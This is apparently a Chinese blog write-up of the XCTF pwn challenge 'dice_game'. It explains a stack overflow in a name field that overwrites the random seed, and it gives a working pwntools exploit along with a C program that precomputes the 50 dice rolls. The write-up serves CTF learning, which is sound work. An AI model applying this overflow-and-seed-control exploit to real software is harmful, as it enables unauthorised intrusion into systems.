【XCTF】dice_game write up

最新推荐文章于 2022-02-19 20:31:35 发布
最新推荐文章于 2022-02-19 20:31:35 发布
阅读量351 收藏 1
点赞数
分类专栏: write up 文章标签: dice_game pwn write up xctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xia739635297/article/details/102560508
版权

1.题目

运行如下:

运行结果

可知,这是一个猜测随机数的程序,需要猜中50次。

检查保护如下:

程序保护

除了Canary之外都开了,估计便是栈溢出。

程序信息如下:

程序信息

64bit程序,动态链接。

2.程序分析(IDA)

使用IDA打开程序

main函数伪代码

该程序首先让输入name,并且使用read来读入数据,故而此处存在栈溢出漏洞。下方看见程序使用seed、srand生成随机数。当我们猜对50次随机数时程序会调用sub_B28函数,从而得到flag.

sub_B28函数

现在来捋清思路。

获取flag<—调用sub_B28函数<—猜对50次随机数<—seed、srand生成随机数<—控制seed便可使生成的随机数固定<—通过栈溢出漏洞控制seed<–寻找buf与seed的偏移距离

寻找偏移:

栈情况

可以看到buf距离ebp的距离是0x50,seed距离ebp的距离是0x10,故buf与seed的偏移为0x50-0x10=0x40

脑补 payload = ‘x’*0x40 + seed

写一个seed为6的c程序,输出50个随机数如下:

随机数

需要的东西都有了,完整exp如下:

# -*- coding: UTF-8 -*-
from pwn import *

p = process("../dice_game")
#p = remote("111.198.29.45", 49679)
li = [4,2,5,6,3,6,5,4,5,5,6,2,4,6,5,3,1,1,4,5,4,3,5,1,6,6,1,5,6,4,2,1,3,4,1,6,1,3,1,6,6,1,5,1,4,3,4,5,4,1]

payload = 'x' * 0x40 + p64(6)
print payload 
print  p.recv()
p.sendline(payload)
x = 1
for i in li :
    print "当前为第" + str(x) + "回合"
    if x > 50 :
        break
    p.recvuntil("point(1~6): ")
    p.sendline(str(i))
    x += 1
print p.recvall()

生成随机数的c程序如下:

#include <stdio.h>
#include <stdlib.h>

int main(){
	int s,i;	
	srand(6);

	for(i = 0;i<50;i++){
		
		s = rand()%6+1;
		printf("%d,",s);

	}


	return 0;
}

exp运行结果如下:

exp运行结果

丶4ut15m
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
dice_game.zip
06-16
资源为攻防世界上的pwn题目样本,主要就是设计缓冲区溢出,大家也可在攻防世界pwn练习题中获取,地址为https://adworld.xctf.org.cn/task/answer?type=pwn&number=2&grade=1&id=4694&page=1
ADworld_level_2
qq_62423835的博客
02-11 569
一部分转载了adworld里的wp,就不用去里面买wp了!
dice_game攻防世界进阶区
shanwei274的博客
04-10 1675
dice_game XCTF 4th-QCTF-2018 前言,不得不说,虽然是个简单题但是还是要记录一下,来让自己记住这些东西。 考察的知识点是: 1.cdll_loadlibrary加载对应库使得Python可以使用c的函数。 2.关于srand函数中种子的介绍。 3.一些平时没有见过的杂项 保证我写的很详细,因为我也是个菜鸡 ----第一步查看保护喽 第一眼就很恐怖嗷,居然就只有canary没有开,其他的全开,got表也不能修改,我就很痛苦嗷 ----第二步ida看看 main函数这里要说的呢 1
攻防世界高手进阶区——dice_game
weixin_62675330的博客
02-19 1881
攻防世界高手进阶区——dice_game 题目里面啥都没有。 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的。 运行 可以看出是要猜数字,猜对50次。 ida逆向 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[55]; // [rsp+0h] [rbp-50h] BYREF char v5; // [rsp+37h] [rbp-19h] ssize_t v6; // [
攻防世界-dice_game-Writeup
SkYe's Blog
05-13 784
dice_game 题目来源: XCTF 4th-QCTF-2018 考点:栈溢出、混合编程 基本情况 程序实现的是一个具有用户姓名输入的菜随机数程序。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 栈溢出 一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制
dice_game(xctf)
weixin_43868725的博客
05-24 838
0x0 程序保护和流程 保护: 流程: main() sub_A20() sub_B28() 只要sub_A20()的验证通过50次就可以通过sub_B20()输出flag。而sub_A20()通过随机数来决定返回的值是否为1。整个程序只有fgets()处可以覆盖栈上其他变量的值,所以可以通过fgets()修改seed[0]的值。 0x1 利用过程 可以观察到seed[0]处于rsp+40h的位置所以padding=‘a’*40之后就可以覆盖seed[0]的值了。 0x2 exp from pwn
dice_game XCTF 4th-QCTF-2018
qq_41071646的博客
04-27 1071
其实感觉这个题 不算是pwn题。。。 这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数 随机数啊 本来我没有想用 把种子给 覆盖掉 但是 time(0) 感觉不稳 时间一万一不对劲 那么随机数 也会出错 所以干脆 把种子固定下来 下面是 exp #coding:utf-8 from pwn import* list...
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训.pptx
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训.pptx
NewsCenter
06-23
自己做的系统,运行没什么问题,页面不是很多,主要有有添加新闻、删除新闻、查看新闻、修改新闻等操作。是三层架构。
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
pwn dice_game
weixin_44319142的博客
05-02 488
dice_game 又是seed from pwn import * from ctypes import * context.log_level='debug' libc = cdll.LoadLibrary("libc.so.6") p = process('./dice_game') #p = remote("111.198.29.45",56813) p.recvuntil(" ...
xctf dice_game
Tw0的博客
10-14 120
rand()函数是使用线性同余法做的,它并不是真的随机数,因为其周期特别长,所以在一定范围内可以看成随机的。 srand()为初始化随机数发生器,用于设置rand()产生随机数时的种子。传入的参数seed为unsigned int类型,通常我们会使用time(0)或time(NULL)的返回值作为seed。 任何在调用rand函数前如果没有设置过srand函数的种子,那么系统会自动设置srand(1)为种子。 总结: 1、import ctypes函数库,选择相应版本的libc动态链接库,(..
126邮箱页 html源码 单页源码 网站后台登陆界面HTML源码.zip
04-23
126邮箱页 html源码 单页源码 网站后台登陆界面HTML源码
武汉开放数据创新大赛——烽火杯文件.zip
04-23
武汉开放数据创新大赛——烽火杯文件
mmexport1713881481676.png
04-23
mmexport1713881481676.png
Digital currency trading platformAdobeXD源码下载设计素材UI设计.xd
最新发布
04-23
Digital currency trading platform landing pageAdobeXD源码下载设计素材UI设计
了解Java及环境搭建
04-23
了解Java及环境搭建
pure_color xctf
07-16
pure_color xctf是一个CTF比赛平台,致力于举办和推广网络安全竞赛。 pure_color xctf的目标是为安全爱好者和专业人士提供一个学习、切磋和交流的平台。这个平台上举办的比赛覆盖了各种网络安全领域,包括但不限于...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值